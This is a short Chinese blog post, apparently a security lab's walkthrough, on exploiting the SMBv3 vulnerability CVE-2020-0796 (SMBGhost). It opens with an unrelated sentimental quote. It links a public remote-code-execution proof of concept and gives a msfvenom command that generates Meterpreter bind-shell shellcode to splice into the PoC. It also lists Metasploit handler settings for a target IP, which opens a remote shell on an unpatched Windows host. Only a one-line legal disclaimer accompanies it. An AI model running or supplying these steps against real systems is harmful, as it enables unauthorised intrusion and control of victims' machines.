会遗憾,但不会后悔,会争取,但不会强求,能低头,但有底线,全妥协,但有原则,希望这能是你。。。。
---- 网易云热评
本篇内容来自雷石安全实验室。
一、漏洞描述:
该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。
二、测试环境及工具:
windows10 1903 64位下载:
ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/
CVE-2020-0796 "poc"下载:
https://github.com/chompie1337/SMBGhost_RCE_PoC
三、漏洞利用
1、生成反向连接木马:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
2、替换POC,将上面生成的代码替换原文中的代码
3、启动Metasploit监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.1.143 目标主机
run
3、运行poc,自动建立连接
禁止非法,后果自负
欢迎关注公众号:web安全工具库